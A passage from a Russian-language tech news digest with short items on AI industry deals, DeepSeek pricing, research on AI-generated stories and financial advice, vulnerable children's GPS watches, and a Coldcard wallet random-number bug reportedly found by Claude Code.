Симптом читается легко: дефицита вычислений хватило, чтобы автомобильная и космическая компании начали строить фабрики сами. Локально всё выглядит менее радужно — анонсу предшествовало собрание округа, куда пришли сотни жителей возмущаться налоговыми льготами и непрозрачностью.

DeepSeek предупредил о существенном росте цен на API. Новые цены не опубликованы, дата не названа (TechNode). Завязали процессы на дешёвый DeepSeek — самое время посчитать запасной вариант. Тем более что OpenAI неделю назад срезала цены Luna впятеро, и разрыв может схлопнуться.

Коротко:

  • Google обсуждает сделку с Mechanize дороже 1,5 миллиарда: команда из 35 человек плюс лицензия на их кодовых агентов (Business Insider).
  • Meta Muse Code, новая деталь от Александра Вана: платный тариф больше чем вдесятеро дешевле конкурентов, субагенты работают в изолированных копиях (CNBC).
  • Исследование Университета Вашингтона: в почти 24 тысячах детских историй, сгенерированных ведущими моделями, самки животных составили лишь 2% персонажей (GeekWire).
  • Новый Орлеан тестирует ИИ-сортировку звонков в 911: повторные обращения по известному происшествию робот отсекает сам (Shreveport Times).
  • Детские GPS-часы дешевле 30 долларов оказались готовой слежкой: журналиста WIRED вели по карте, снимали и слушали. Десятки миллионов часов сидят на трёх уязвимых платформах (WIRED).
  • Джейми Даймон собрал больше 40 компаний в альянс по рискам ИИ и кибербезопасности — сигнал, что требования к подрядчикам скоро подтянут (Reuters).
  • Исследование MIT и Стэнфорда: советы ИИ по финансам помогли большинству, но развели пенсионные накопления на 4–5% (MIT Sloan).
  • Epoch AI посчитала: в июле 21 техкомпания раскрыла около 2500 опасных уязвимостей — впятеро больше прежнего месячного рекорда (Zvi).
  • Ошибка в генераторе случайных чисел кошелька Coldcard, жившая с 2021 года, стоила владельцам около 116 миллионов долларов. Claude Code нашёл эту уязвимость самостоятельно за восемь минут (TRM Labs).
Откомментируйте первым 👇

😎

Автор поста открыл его для большого интернета, но комментирование и движухи доступны только участникам Клуба

Что вообще здесь происходит?


Войти  или  Вступить в Клуб